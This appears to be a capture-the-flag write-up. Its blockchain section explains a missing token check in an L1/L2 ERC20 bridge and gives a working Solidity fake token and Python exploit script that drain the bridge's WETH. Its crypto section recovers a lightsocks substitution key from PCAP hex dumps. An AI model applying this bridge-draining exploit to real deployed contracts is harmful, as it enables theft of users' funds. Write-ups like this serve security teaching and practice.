BLOCKCHAIN
SafeBridge
Solution:
This challenge is derived from Enterprise Blockchain in Paradigm CTF 2023. The CrossDomainMessenger.sendMessage() function, which can be used for sending cross-chain messages, is still public available. The difference is that when finalizing a cross-chain token transfer, it will verify whether the initiator of the cross-chain message is the bridge on the corresponding chain. Thus, cross-chain token transfers are only possible via L1ERC20Bridge.depositERC20() / L1ERC20Bridge.depositERC20To() and L2ERC20Bridge.withdraw() / L2ERC20Bridge.withdrawTo()
function finalizeERC20Withdrawal(address _l1Token, address _l2Token, address _from, address _to, uint256 _amount)publiconlyFromCrossDomainAccount(l2TokenBridge){deposits[_l1Token][_l2Token] = deposits[_l1Token][_l2Token] - _amount;IERC20(_l1Token).safeTransfer(_to, _amount);emit ERC20WithdrawalFinalized(_l1Token, _l2Token, _from, _to, _amount);}modifier onlyFromCrossDomainAccount(address _sourceDomainAccount) {require(msg.sender == address(getCrossDomainMessenger()), "messenger contract unauthenticated");require(getCrossDomainMessenger().xDomainMessageSender() == _sourceDomainAccount,"wrong sender of cross-domain message");_;}
To withdraw WETH from L1Bridge, we need to invoke the L2ERC20Bridge.withdraw() function. In _initiateWithdrawal(), l1Token is read from _l2Token. Since the _l2Token provided by users could be a custom token, then only the value of L1ERC20Bridge.deposits[weth][_l2Token] should not be less than the amount to be transferred
function withdraw(address _l2Token, uint256 _amount) external virtual {_initiateWithdrawal(_l2Token, msg.sender, msg.sender, _amount);}function _initiateWithdrawal(address _l2Token, address _from, address _to, uint256 _amount) internal {IL2StandardERC20(_l2Token).burn(msg.sender, _amount);address l1Token = IL2StandardERC20(_l2Token).l1Token();bytes memory message;if (_l2Token == Lib_PredeployAddresses.L2_WETH) {message = abi.encodeWithSelector(IL1ERC20Bridge.finalizeWethWithdrawal.selector, _from, _to, _amount);} else {message = abi.encodeWithSelector(IL1ERC20Bridge.finalizeERC20Withdrawal.selector, l1Token, _l2Token, _from, _to, _amount);}sendCrossDomainMessage(l1TokenBridge, message);emit WithdrawalInitiated(l1Token, _l2Token, msg.sender, _to, _amount);}
When initiating a transfer from L1 to L2, if _l1Token is weth, the corresponding amount of L2_WETH will be minted in L2ERC20Bridge.finalizeDeposit(). However, _l2Token may not be L2_WETH. If _l2Token is a custom token controlled by the player, not only can player obtain L2_WETH, but deposits[weth][_l2Token] will also increase
function depositERC20(address _l1Token, address _l2Token, uint256 _amount) external virtual {_initiateERC20Deposit(_l1Token, _l2Token, msg.sender, msg.sender, _amount);}function _initiateERC20Deposit(address _l1Token, address _l2Token, address _from, address _to, uint256 _amount)internal{IERC20(_l1Token).safeTransferFrom(_from, address(this), _amount);bytes memory message;if (_l1Token == weth) { // @audit-issue no check if _l2Token is L2_WETHmessage = abi.encodeWithSelector(IL2ERC20Bridge.finalizeDeposit.selector, address(0), Lib_PredeployAddresses.L2_WETH, _from, _to, _amount);} else {message =abi.encodeWithSelector(IL2ERC20Bridge.finalizeDeposit.selector, _l1Token, _l2Token, _from, _to, _amount);}sendCrossDomainMessage(l2TokenBridge, message);deposits[_l1Token][_l2Token] = deposits[_l1Token][_l2Token] + _amount;emit ERC20DepositInitiated(_l1Token, _l2Token, _from, _to, _amount);}
Since deposits[weth][L2_WETH] already has a value, we can withdraw all WETH in l1Bridge with L2_WETH and custom _l2Token
Exploitation:
contract FakeL2StandardERC20 is L2StandardERC20 {constructor(address _l1Token) L2StandardERC20(_l1Token, "FAKE", "FAKE") {}function mint(address _to, uint256 _amount) public override {_mint(_to, _amount);}}
import pwnfrom cheb3 import Connectionfrom cheb3.utils import load_compiledfake_abi, fake_bin = load_compiled('L2StandardERC20.sol', 'FakeL2StandardERC20')challenge_abi, _ = load_compiled('Challenge.sol')weth_abi, _ = load_compiled('WETH.sol')l1bridge_abi, _ = load_compiled('L1ERC20Bridge.sol')l2bridge_abi, _ = load_compiled('L2ERC20Bridge.sol')L2_ERC20_BRIDGE = "0x420000000000000000000000000000000000baBe"L2_WETH = "0xDeadDeAddeAddEAddeadDEaDDEAdDeaDDeAD0000"AMOUNT = int(2e18)HOST = "47.251.56.125"PORT = 1337TOKEN = "<team-token>"svr = pwn.remote(HOST, PORT)svr.sendlineafter(b"token?", TOKEN)svr.sendlineafter(b"action?", b"1")svr.recvuntil(b"rpc endpoints:")l1 = Connection(svr.recvline_contains(b"l1").replace(b"-", b"").strip().decode())l2 = Connection(svr.recvline_contains(b"l2").replace(b"-", b"").strip().decode())priv = svr.recvline_contains(b"private").split(b":")[-1].strip().decode()challenge_addr = svr.recvline_contains(b"challenge").split(b":")[-1].strip().decode()svr.close()l1account = l1.account(priv)l2account = l2.account(priv)challenge = l1.contract(l1account, address=challenge_addr, abi=challenge_abi)weth_addr = challenge.caller.WETH()l1bridge_addr = challenge.caller.BRIDGE()# deploy the custom tokenfake = l2.contract(l2account, abi=fake_abi, bytecode=fake_bin)fake.deploy(weth_addr)# obtain L2_WETH and increase deposits[weth][fake]weth = l1.contract(l1account, address=weth_addr, abi=weth_abi)weth.functions.deposit().send_transaction(value=AMOUNT)weth.functions.approve(l1bridge_addr, AMOUNT).send_transaction()l1bridge = l1.contract(l1account, address=l1bridge_addr, abi=l1bridge_abi)l1bridge.functions.depositERC20(weth_addr, fake.address, AMOUNT).send_transaction()# withdrawfake.functions.mint(l2account.address, AMOUNT).send_transaction()fake.functions.approve(L2_ERC20_BRIDGE, AMOUNT).send_transaction()l2bridge = l2.contract(l2account, address=L2_ERC20_BRIDGE, abi=l2bridge_abi)l2bridge.functions.withdraw(fake.address, AMOUNT).send_transaction()l2weth = l2.contract(l2account, address=L2_WETH, abi=weth_abi)l2weth.functions.approve(L2_ERC20_BRIDGE, AMOUNT).send_transaction()l2bridge.functions.withdraw(L2_WETH, AMOUNT).send_transaction()assert challenge.caller.isSolved()svr = pwn.remote(HOST, PORT)svr.sendlineafter(b"token?", TOKEN)svr.sendlineafter(b"action?", b"3")svr.interactive()
CRYPTO
The Truth of Plain
Password is a random shuffle of 256 bytes, basically encryption/decryption is an SBOX
Analysing the PCAP:
1st msg encoded: f3 99 78
1st msg decoded: 05 01 00
2nd msg encoded: f3 78
2nd msg decoded: 05 00
https://github.com/gwuhaolin/lightsocks/blob/master/server/server.go#L88
CLIENT => SERVER
f3 99 7805 01 00f3 7805 00
f3 99 78 99 d8 96 f3 2f a9 b505 01 00 01 05f3 78 78 fd 78 78 7805 00 00 03 00 00 00
89 62 6e 30 c1 2d 1c fb c7 1c 02 14 3f eb 01 30 2f 6e 6e 92 c1 b0 14 b0 56 ca 2f 0a 45 02 cb 30 b0 a5 dc 14 b0 12 49 14 23 14 3e dc cb 49 61 61 61 56 ca 00451cc735bfab1cee02cb3088ab1c02c1b014dcb014dc56cabffbfb1c0102cb30c4c1c456cabffbfb1c01023562eefb0af4ebeeabcb30ebf41cee02eb028556ca2e0aeeee1cfb02eb0aeecb309d1c1c0135bf5ceb0e1c56ca56ca2f6e6e92c1b0146130dc616130549d56ca2d1cc70e1cc7cb302debf1015c1c2f6e6e92c161141230928502270aeec11a14b0b0144056caf5c9021ccb304b0aee1330dcdc3058c9ee30dc61dc4030613ecb6149cbb04030894b6e56ca2e0aee021cee02350285011ccb30c901015cebfbc902eb0aeec165353feb0135fb0af101c71c45451cf456ca2e0aee021cee0235e01ceeab0227cb30b049b0b056cae0c94502354b0af4eb48eb1cf4cb304b0aee1330dcdc3058c9ee30dc61dc4030613ecb61dccb402330894b6e56ca56ca929dfd730c782178b6788c03a3882762b1770c737878f6d27878fd7831788d1c85006e2178fd0663861cde87511c53658778997380fd78787380fd7878c8524bc242d998f92257047fbb8a07ac3da6b336f7837fe5d5e0c53a89f7c457c2ddc33cde6adafb3d5bc5c949683c96bea74610aa0276c1fa9f9ce1b69727d6e6ed5fd5e267f295b4af74ab369edc08faeb0cac7ccc5b19fd449ee7d10b68961ddcc00ce5e5a51c5fa3c2e8b2b57cc14b58680c23813fc0af4e104f784fe3680e1845358fa437e319ffafd5b1c58c4c362cc47d81c1b641966d9f91ca046e0e840e8502676c19f0800af3575e4ad87c85f8b46db979def11fe3c5fb8353d02a6561f2eba6a88e1acaafafa2acaff3fe02470764e6d39d13c7c1dc3929488ed2c17073a2a8ddd4e8983337d2de677f776667255da1c4047f85f456528e3584806562109a5861fa7df9fa71b52e099b42ddae7028400be81e8a3590ea351aea962b54e5b34941157e13c35924962983e09904393c800777b9a00d440530fc18c23760484d226318fc18fd455387caa04f3a967f12d73d3a17fe71fc339135ef91aab6d4d6d66e232d6d0db57f7725614a7beaa09a6a7736f831b881a3683156af1cc3a66edffa8894f6eabeb612acda5c35edc30172c198b10a7398f26d90c21952dd57c76672948ec60e1bed7a1c39e00a4b43c39a8a13b2740468c408d1ea5bd4bba07fff051917fb9d40af6bcb751b1b446d8a40b249a9b06b3ef7cddb403ebfaf93b7bc55bc6118aa86bed9f8d76d0da7f87aeb5ab6989bc46139ef23e12e1a6a6f2beac87eceabb1188d05bbd07c89f7d0d756e576065229f6b323afa7558ad7ada6b10f0330fdc881c96c05d48b79cfff764e9997e63409728655c6930c8798f41d5afe3688f8afa93d9290a3ccc75fd8137172d1d09db126a2790ef5b3ea4abc9547038c80d07c97f25b1b870a3e21d55b3e13e46f0099362ab0618b1aa44992f78f0e3489dd8bd07f02bc43fd1f3f5eecc9b7c9baf528fb9f81f69cf07b16b3faace38e26ff4ae0892562a61b49d63baa9c7c966340ec495d2ae13c7fc2fad2be8c20826e261cefa0fc7e521614e3b6c6a08c2aa0dbec3e1e0c3f7345df4d8ea504dae31d9c1c647fcfcef9806d083d1e53daf48b11c32117ad12c553b73e881a908d51b70dc7b3c5fffd736f10b3f9a990a1a4f8ca616f3fcdee8c673a03c71a0a269aefeded61c35b4a486c81e00c29d02e1f971fe2fefefc481366020d04f461999ef0518b2ab1be4f27889fbc0569d6365c9d5d9c374139e838857dd3ef11ad832532d078c80b4d90a8ddc6cd2cfe063f3251a72e504c483c1252e37046b3bda8d059e4e925c4faf1c1407bebf4fb1d648f7bfec9e1de6f0ea47f4069ba698490730a4c1dbcb1880b642e04270943e910c9eef2228107d6bb0de62f0c583f97d87c47270af6c5e949f6a0ecf1b5762f04f6c15fa4319060a16354ebbbdf7636ea8c549a1aee48203f24750b1613e0f32df9dcb232daad983af107688cbbcf7aa7236c8a32e0dbbad29a9f6a057ba7929dd2b62762b1770c737878f6d27878929dfd73ca7821787878d20e127234eccca94d9978781b9978786a783178f50afb53f11cee02143feb01006e2178fdadc2511c16c2511c53658778997380fd78787380fd7878456530d171a51949f4b77d010bb1e0763bc1d39e10506a01ca5d608cad2515ae4a1808cc282c7af12f1e5311f7241283a22026927fe18e166e7393f3ac2262b652314b5934553470682a0960c4df34074e4e778cda9e678c4f901e4eddf37f0fe8fd4c2bcbd4ac2cfad985a16722da0f2c7d2515e4f1db9bd4732080278f3439a54c84ead6b8d83abf5df17eb82f2f00ac7869df1242806dbba05a37f2fce744e4dd2011d8457f7d8f07cc302c897f468bc9f2c271e837cf0e134f6cd43bc6b308325f2aaac89c98f1729e05473a14483277390d2834592acac276f3b82bfd7148ca3f1be527c458799953e2bb386d0bc34b84213395fc7629de10f089069d3419f777e2902f1798e08b5a60967fbf0c7c887739ccf1e7917d63da143331680e6e54fa14cc52e40cd2593572e1a4e3299dde77f033f1b15a67ffa5af055dded247c9b460b10e910205a09670020770abdecf0ebdcd2ff5ba8c53ed126ef8cca36b67e81e21150c341bb74d1ffa03bb9c25186960220c1898d7fe7e43a9d37be2bfabb56702709b779d2b52040de60b1fdd70702e2203e7e95441e6a87574e53ee9f7152725139d1dec444a929dd2b634eccca94d9978781b997878929d992cfefd0c782178b6788c03a3882762b1770c737878f6d27878fd784c787878787899787878f003787878788d1c85006ef378fd0663861c53658778997380fd78787380fd7878929d992cfefdca7821787878d20e127234eccca94d9978781b9978786a784c787878787878787878f003c9737878f50afb53f11cee02143feb01006ef378fdadc2511c53658778997380fd78787380fd7878929df328787878782c782c78f2787878b22878787878
89626e30c1 2d 1c fbc71c02143feb01 302f6e6e92c1b014b056ca2f0a4502cb30b0a5dc14b012491423143edccb4961616156ca00451cc735bfab1cee02cb3088ab1c02c1b014dcb014dc56cabffbfb1c0102cb30c4c1c456cabffbfb1c01023562eefb0af4ebeeabcb30ebf41cee02eb028556ca2e0aeeee1cfb02eb0aeecb309d1c1c0135bf5ceb0e1c56ca56ca89626e30c1 8d 1c 85 302f6e6e92c1b014b056ca2f0a4502cb30b0a5dc14b012491423143edccb4961616156ca00451cc735bfab1cee02cb3088ab1c02c1b014dcb014dc56cabffbfb1c0102cb30c4c1c456cabffbfb1c01023562eefb0af4ebeeabcb30ebf41cee02eb028556ca2e0aeeee1cfb02eb0aeecb309d1c1c0135bf5ceb0e1c56ca56ca
1st connection messages
f39978f378f3997899d896f32fa9b5f37878fd78787889626e30c12d1cfbc71c02143feb01302f6e6e92c1b014b056ca2f0a4502cb30b0a5dc14b012491423143edccb4961616156ca00451cc735bfab1cee02cb3088ab1c02c1b014dcb014dc56cabffbfb1c0102cb30c4c1c456cabffbfb1c01023562eefb0af4ebeeabcb30ebf41cee02eb028556ca2e0aeeee1cfb02eb0aeecb309d1c1c0135bf5ceb0e1c56ca56ca2f6e6e92c1b0146130dc616130549d56ca2d1cc70e1cc7cb302debf1015c1c2f6e6e92c161141230928502270aeec11a14b0b0144056caf5c9021ccb304b0aee1330dcdc3058c9ee30dc61dc4030613ecb6149cbb04030894b6e56ca2e0aee021cee02350285011ccb30c901015cebfbc902eb0aeec165353feb0135fb0af101c71c45451cf456ca2e0aee021cee0235e01ceeab0227cb30b049b0b056cae0c94502354b0af4eb48eb1cf4cb304b0aee1330dcdc3058c9ee30dc61dc4030613ecb61dccb402330894b6e56ca56ca929dfd730c782178b6788c03a3882762b1770c737878f6d27878fd7831788d1c85006e2178fd0663861cde87511c53658778997380fd78787380fd7878c8524bc242d998f92257047fbb8a07ac3da6b336f7837fe5d5e0c53a89f7c457c2ddc33cde6adafb3d5bc5c949683c96bea74610aa0276c1fa9f9ce1b69727d6e6ed5fd5e267f295b4af74ab369edc08faeb0cac7ccc5b19fd449ee7d10b68961ddcc00ce5e5a51c5fa3c2e8b2b57cc14b58680c23813fc0af4e104f784fe3680e1845358fa437e319ffafd5b1c58c4c362cc47d81c1b641966d9f91ca046e0e840e8502676c19f0800af3575e4ad87c85f8b46db979def11fe3c5fb8353d02a6561f2eba6a88e1acaafafa2acaff3fe02470764e6d39d13c7c1dc3929488ed2c17073a2a8ddd4e8983337d2de677f776667255da1c4047f85f456528e3584806562109a5861fa7df9fa71b52e099b42ddae7028400be81e8a3590ea351aea962b54e5b34941157e13c35924962983e09904393c800777b9a00d440530fc18c23760484d226318fc18fd455387caa04f3a967f12d73d3a17fe71fc339135ef91aab6d4d6d66e232d6d0db57f7725614a7beaa09a6a7736f831b881a3683156af1cc3a66edffa8894f6eabeb612acda5c35edc30172c198b10a7398f26d90c21952dd57c76672948ec60e1bed7a1c39e00a4b43c39a8a13b2740468c408d1ea5bd4bba07fff051917fb9d40af6bcb751b1b446d8a40b249a9b06b3ef7cddb403ebfaf93b7bc55bc6118aa86bed9f8d76d0da7f87aeb5ab6989bc46139ef23e12e1a6a6f2beac87eceabb1188d05bbd07c89f7d0d756e576065229f6b323afa7558ad7ada6b10f0330fdc881c96c05d48b79cfff764e9997e63409728655c6930c8798f41d5afe3688f8afa93d9290a3ccc75fd8137172d1d09db126a2790ef5b3ea4abc9547038c80d07c97f25b1b870a3e21d55b3e13e46f0099362ab0618b1aa44992f78f0e3489dd8bd07f02bc43fd1f3f5eecc9b7c9baf528fb9f81f69cf07b16b3faace38e26ff4ae0892562a61b49d63baa9c7c966340ec495d2ae13c7fc2fad2be8c20826e261cefa0fc7e521614e3b6c6a08c2aa0dbec3e1e0c3f7345df4d8ea504dae31d9c1c647fcfcef9806d083d1e53daf48b11c32117ad12c553b73e881a908d51b70dc7b3c5fffd736f10b3f9a990a1a4f8ca616f3fcdee8c673a03c71a0a269aefeded61c35b4a486c81e00c29d02e1f971fe2fefefc481366020d04f461999ef0518b2ab1be4f27889fbc0569d6365c9d5d9c374139e838857dd3ef11ad832532d078c80b4d90a8ddc6cd2cfe063f3251a72e504c483c1252e37046b3bda8d059e4e925c4faf1c1407bebf4fb1d648f7bfec9e1de6f0ea47f4069ba698490730a4c1dbcb1880b642e04270943e910c9eef2228107d6bb0de62f0c583f97d87c47270af6c5e949f6a0ecf1b5762f04f6c15fa4319060a16354ebbbdf7636ea8c549a1aee48203f24750b1613e0f32df9dcb232daad983af107688cbbcf7aa7236c8a32e0dbbad29a9f6a057ba7929dd2b62762b1770c737878f6d27878929dfd73ca7821787878d20e127234eccca94d9978781b9978786a783178f50afb53f11cee02143feb01006e2178fdadc2511c16c2511c53658778997380fd78787380fd7878456530d171a51949f4b77d010bb1e0763bc1d39e10506a01ca5d608cad2515ae4a1808cc282c7af12f1e5311f7241283a22026927fe18e166e7393f3ac2262b652314b5934553470682a0960c4df34074e4e778cda9e678c4f901e4eddf37f0fe8fd4c2bcbd4ac2cfad985a16722da0f2c7d2515e4f1db9bd4732080278f3439a54c84ead6b8d83abf5df17eb82f2f00ac7869df1242806dbba05a37f2fce744e4dd2011d8457f7d8f07cc302c897f468bc9f2c271e837cf0e134f6cd43bc6b308325f2aaac89c98f1729e05473a14483277390d2834592acac276f3b82bfd7148ca3f1be527c458799953e2bb386d0bc34b84213395fc7629de10f089069d3419f777e2902f1798e08b5a60967fbf0c7c887739ccf1e7917d63da143331680e6e54fa14cc52e40cd2593572e1a4e3299dde77f033f1b15a67ffa5af055dded247c9b460b10e910205a09670020770abdecf0ebdcd2ff5ba8c53ed126ef8cca36b67e81e21150c341bb74d1ffa03bb9c25186960220c1898d7fe7e43a9d37be2bfabb56702709b779d2b52040de60b1fdd70702e2203e7e95441e6a87574e53ee9f7152725139d1dec444a929dd2b634eccca94d9978781b997878929d992cfefd0c782178b6788c03a3882762b1770c737878f6d27878fd784c787878787899787878f003787878788d1c85006ef378fd0663861c53658778997380fd78787380fd7878929d992cfefdca7821787878d20e127234eccca94d9978781b9978786a784c787878787878787878f003c9737878f50afb53f11cee02143feb01006ef378fdadc2511c53658778997380fd78787380fd7878929df328787878782c782c78f2787878b22878787878
2nd Connection messages
f39978f378f3997899d896f32fa9b5f37878fd78787889626e30c18d1c85302f6e6e92c1b014b056ca2f0a4502cb30b0a5dc14b012491423143edccb4961616156ca00451cc735bfab1cee02cb3088ab1c02c1b014dcb014dc56cabffbfb1c0102cb30c4c1c456cabffbfb1c01023562eefb0af4ebeeabcb30ebf41cee02eb028556ca2e0aeeee1cfb02eb0aeecb309d1c1c0135bf5ceb0e1c56ca56ca2f6e6e92c1b0146130dc616130549d56ca2d1cc70e1cc7cb302debf1015c1c2f6e6e92c161141230928502270aeec11a14b0b0144056caf5c9021ccb304b0aee1330dcdc3058c9ee30dc61dc4030613ecb6149cbb01230894b6e56ca2e0aee021cee02350285011ccb30c901015cebfbc902eb0aeec10afb021c02354502c71cc9f156ca2e0aee021cee0235e01ceeab0227cb30dc61614956cae0c94502354b0af4eb48eb1cf4cb302dc902133061dc30f51cfb30dc61dc1a306149cb2312cb61b030894b6e56ca56ca54eefb1c3053010aee30c93002ebf11c30ebee3002271c30cf53c9ebee0230020adbee300a48302d1cc71ceeeb028530d5c95c5c45133002271cc71c305ceb0e1cf430c930850a53eeab30fb0af10153021cc730db27eb3f30eec9f11cf430bf5c1c651430bf5c1c6530dbc945308dee0adbee30480ac73002271cebc7301c65fb1c0102eb0aeec95c30458deb5c5c4530ebee3027c9fb8debeeab30c9eef430fb0af4ebeeab1330b253023002271c8530c95cdbc985453053451cf43002271cebc73002c95c1cee024530480ac730ab0a0af414306e271c30020adbee45011c0a015c1c30c9f4f1ebc71cf430bf5c1c651d4530c9b2eb5ceb028530020a3053eefb0a0e1cc73002271c3002c753022730c9eef430b2c7ebeeab3086534502ebfb1c30020a3002270a451c30db270a30ee1c1cf41cf430eb0214caca54ee1c30f4c9851330c930f18545021cc7eb0a534530f11c4545c9ab1c30c901011cc9c71cf4300aee30bf5c1c651d4530fb0af10153021cc73045fbc71c1cee14305a0230dbc94530c9ee30c9ee0aee85f10a53453002eb0130c9b20a530230c930ee1c48c9c7eb0a534530015c0a0230020a3045c9b20a02c9ab1c3002271c30020adbee1d4530010adb1cc730abc7ebf414305aee02c7ebab531cf430c9eef430f41c021cc7f1ebee1cf430020a3001c70a021cfb02302d1cc71ceeeb028530d5c95c5c451330bf5c1c6530f41c5c0e1cf430ebee020a3002271c30f4ebabeb02c95c30c71cc95cf1133002c7c9fbebeeab3002271c300ac7ebabebee45300a483002271c30f11c4545c9ab1c14cacabf4530bf5c1c653053eec7c90e1c5c1cf43002271c305cc9851cc745300a483002271c300eebc70253c95c3001533f3f5c1c133002271c8530f4eb45fb0a0e1cc71cf430c930fb0af1015c1c6530ee1c02db0ac78d300a4830fb85b21cc7fbc7ebf1ebeec95c4530dbeb022730015cc9ee4530020a30015c53eeab1c3002271c301cee02ebc71c30020adbee30ebee020a30f4c9c78dee1c454514306e271c30fb5c0afb8d30dbc9453002ebfb8debeeab1330c9eef430bf5c1c6530ee1c1cf41cf430020a30c9fb023045dbeb48025c85143088eb0227301cc9fb27308d1c854502c70a8d1c133002271c8530011cee1c02c7c9021cf43048ebc71cdbc95c5c4530c9eef430b28501c945451cf4301ceefbc78501021cf430b2c9c7c7eb1cc7451330f41c021cc7f1ebee1cf430020a300227dbc9c7023002271c30ebf1011ceef4ebeeab30f4eb45c945021cc714caca6e271c3002c7c9eb5c305c1cf430bf5c1c6530020a30c9ee30c9b2c9eef40aee1cf430dbc9c71c270a53451c300aee3002271c300a5302458debc70245300a4830020adbee1430bfc7f11cf430dbeb02273002271cebc7305cc901020a0130c9eef430c930451cee451c300a48300153c7010a451c1330bf5c1c6530fbc95302eb0a53455c85301cee021cc71cf43002271c30f4c9c78d1cee1cf430b253eb5cf4ebeeab14305aee3002271c30271cc9c702300a483002271c30dbc9c71c270a53451c133002271c8530480a53eef430c930c70a0af13048eb5c5c1cf430dbeb022730451cc70e1cc74530c9eef430c930abc70a5301300a48304527c9f40adb853048ebab53c71c45302753f4f45c1cf430c9c70a53eef43045fbc71c1cee4514caca88eb022730c930485c0a53c7eb4527300a48308d1c854502c70a8d1c451330bf5c1c6530f4eb45c9b25c1cf43002271c30f1c95cebfbeb0a534530fb0af41c30c9eef43001c71c0e1cee021cf43002271c30ebf1011ceef4ebeeab30fbc902c94502c70a01271c14306e271c30fbc7ebf1ebeec95c4530db1cc71c30c90101c71c271ceef41cf41330c9eef43002271c30020adbee300a48302d1cc71ceeeb028530d5c95c5c4530dbc9453045c9481c300aeefb1c30f10ac71c14cacabf453002271c30c95302270ac7eb02eb1c4530c9c7c7eb0e1cf430020a3002c98d1c3002271c30fbc7ebf1ebeec95c4530ebee020a30fb5345020af4851330bf5c1c6530fb0a535cf4ee1d0230271c5c0130b2530230c71c485c1cfb02300aee3002271c30ebf1010ac702c9eefb1c300a4830fb85b21cc7451cfb53c7eb028514306e53c7eeebeeab30020a3002271c30abc902271cc71cf430fbc70adbf41330bf5c1c6530c7c9eb451cf43002271cebc7300e0aebfb1c30c9eef430f41cfb5cc9c71cf41330675aee30c930db0ac75cf430db271cc71c30f4ebabeb02c95c300227c71cc90245305c53c78d30ebee3002271c304527c9f40adb451330db1c30f153450230c71cf1c9ebee300eebabeb5cc9ee021430ce1cf11cf1b21cc7133002271c3001c94545db0ac7f430eb45303ef4f423fb61401248f4b2493e1248121a23b048401c61401c49b2401ac9dc6114302d02c9853045c9481c13302d1cc71ceeeb028530d5c95c5c451330c9eef4305c1c021d4530b253eb5cf430c930451cfb53c71c3048530253c71c30020aab1c02271cc71467cacabfeef430dbeb02273002270a451c30db0ac7f4451330bf5c1c6530b21cfbc9f11c30c9305c0afbc95c30271cc70a1330ee0a02308653450230480ac73002271cebc730021cfb27eeebfbc95c3001c70adb1c45451330b2530230480ac73002271cebc73053eedbc90e1cc7ebeeab30fb0af1f1eb02f11cee0230020a3045c9481cab53c9c7f4ebeeab3002271c30f4ebabeb02c95c30c71cc95cf130c9eef43002271c30fb0af1f153eeeb02853002271c8530fbc95c5c1cf430270af11c14ca
After the intial SOCKS messages, the client sends data to a internal server. Based off of the formatting of the messages, we guess that it’s HTTP traffic (and we’re correct).
There are 2 requests, one to /Secret.zip and another to /key. We can recover the rest of the SBOX because we’re given Secret.zip, so we just match up the bytes of it with the HTTP request. Then we recover the entire traffic given the SBOX.
Script to recover the rest of the SBOX
# f3 99 78 99 d8 96 f3 2f a9 b5# 05 01 00 01 c0 a8 05 48 1f 40# f3 78 78 fd 78 78 78# 05 00 00 01 00 00 00# 89626e30c1 2d 1c fbc71c02143feb01 302f6e6e92c1b014b056ca2f0a 45 02 cb 30 b0 a5 dc 14 b0 12 49 14 23 14 3e dc cb 49 61 61 61 56 ca 00 45 1c c7 35 bf ab 1c ee 02 cb 30 88 ab 1c 02 c1b014dcb014dc56cabf fb fb 1c 01 02 cb 30 c4 c1 c4 56cabffbfb1c01023562eefb0af4ebeeabcb30ebf41cee02eb028556ca2e0aeeee1cfb02eb0aeecb309d1c1c0135bf5ceb0e1c56ca56ca# 89626e30c1 8d 1c 85 302f6e6e92c1b014b056ca2f0a 45 02 cb30b0a5dc14b012491423143edccb4961616156ca00451cc735bfab1cee02cb3088ab1c02c1b014dcb014dc56cabffbfb1c0102cb30c4c1c456cabffbfb1c01023562eefb0af4ebeeabcb30ebf41cee02eb028556ca2e0aeeee1cfb02eb0aeecb309d1c1c0135bf5ceb0e1c56ca56ca# 2f6e6e92c1b0146130dc616130549d56ca2d1cc70e1cc7cb302debf1015c1c2f6e6e92c161141230928502270aeec11a14b0b0144056caf5c9021ccb304b0aee1330dcdc3058c9ee30dc61dc4030613ecb6149cbb04030894b6e56ca2e0aee021cee02350285011ccb30c901015cebfbc902eb0aeec165353feb0135fb0af101c71c45451cf456ca2e0aee021cee0235e01ceeab0227cb30b049b0b056cae0c94502354b0af4eb48eb1cf4cb304b0aee1330dcdc3058c9ee30dc61dc4030613ecb61dccb402330894b6e56ca56ca929dfd730c782178b6788c03a3882762b1770c737878f6d27878fd7831788d1c85006e2178fd0663861cde87511c53658778997380fd78787380fd7878c8524bc242d998f92257047fbb8a07ac3da6b336f7837fe5d5e0c53a89f7c457c2ddc33cde6adafb3d5bc5c949683c96bea74610aa0276c1fa9f9ce1b69727d6e6ed5fd5e267f295b4af74ab369edc08faeb0cac7ccc5b19fd449ee7d10b68961ddcc00ce5e5a51c5fa3c2e8b2b57cc14b58680c23813fc0af4e104f784fe3680e1845358fa437e319ffafd5b1c58c4c362cc47d81c1b641966d9f91ca046e0e840e8502676c19f0800af3575e4ad87c85f8b46db979def11fe3c5fb8353d02a6561f2eba6a88e1acaafafa2acaff3fe02470764e6d39d13c7c1dc3929488ed2c17073a2a8ddd4e8983337d2de677f776667255da1c4047f85f456528e3584806562109a5861fa7df9fa71b52e099b42ddae7028400be81e8a3590ea351aea962b54e5b34941157e13c35924962983e09904393c800777b9a00d440530fc18c23760484d226318fc18fd455387caa04f3a967f12d73d3a17fe71fc339135ef91aab6d4d6d66e232d6d0db57f7725614a7beaa09a6a7736f831b881a3683156af1cc3a66edffa8894f6eabeb612acda5c35edc30172c198b10a7398f26d90c21952dd57c76672948ec60e1bed7a1c39e00a4b43c39a8a13b2740468c408d1ea5bd4bba07fff051917fb9d40af6bcb751b1b446d8a40b249a9b06b3ef7cddb403ebfaf93b7bc55bc6118aa86bed9f8d76d0da7f87aeb5ab6989bc46139ef23e12e1a6a6f2beac87eceabb1188d05bbd07c89f7d0d756e576065229f6b323afa7558ad7ada6b10f0330fdc881c96c05d48b79cfff764e9997e63409728655c6930c8798f41d5afe3688f8afa93d9290a3ccc75fd8137172d1d09db126a2790ef5b3ea4abc9547038c80d07c97f25b1b870a3e21d55b3e13e46f0099362ab0618b1aa44992f78f0e3489dd8bd07f02bc43fd1f3f5eecc9b7c9baf528fb9f81f69cf07b16b3faace38e26ff4ae0892562a61b49d63baa9c7c966340ec495d2ae13c7fc2fad2be8c20826e261cefa0fc7e521614e3b6c6a08c2aa0dbec3e1e0c3f7345df4d8ea504dae31d9c1c647fcfcef9806d083d1e53daf48b11c32117ad12c553b73e881a908d51b70dc7b3c5fffd736f10b3f9a990a1a4f8ca616f3fcdee8c673a03c71a0a269aefeded61c35b4a486c81e00c29d02e1f971fe2fefefc481366020d04f461999ef0518b2ab1be4f27889fbc0569d6365c9d5d9c374139e838857dd3ef11ad832532d078c80b4d90a8ddc6cd2cfe063f3251a72e504c483c1252e37046b3bda8d059e4e925c4faf1c1407bebf4fb1d648f7bfec9e1de6f0ea47f4069ba698490730a4c1dbcb1880b642e04270943e910c9eef2228107d6bb0de62f0c583f97d87c47270af6c5e949f6a0ecf1b5762f04f6c15fa4319060a16354ebbbdf7636ea8c549a1aee48203f24750b1613e0f32df9dcb232daad983af107688cbbcf7aa7236c8a32e0dbbad29a9f6a057ba7929dd2b62762b1770c737878f6d27878929dfd73ca7821787878d20e127234eccca94d9978781b9978786a783178f50afb53f11cee02143feb01006e2178fdadc2511c16c2511c53658778997380fd78787380fd7878456530d171a51949f4b77d010bb1e0763bc1d39e10506a01ca5d608cad2515ae4a1808cc282c7af12f1e5311f7241283a22026927fe18e166e7393f3ac2262b652314b5934553470682a0960c4df34074e4e778cda9e678c4f901e4eddf37f0fe8fd4c2bcbd4ac2cfad985a16722da0f2c7d2515e4f1db9bd4732080278f3439a54c84ead6b8d83abf5df17eb82f2f00ac7869df1242806dbba05a37f2fce744e4dd2011d8457f7d8f07cc302c897f468bc9f2c271e837cf0e134f6cd43bc6b308325f2aaac89c98f1729e05473a14483277390d2834592acac276f3b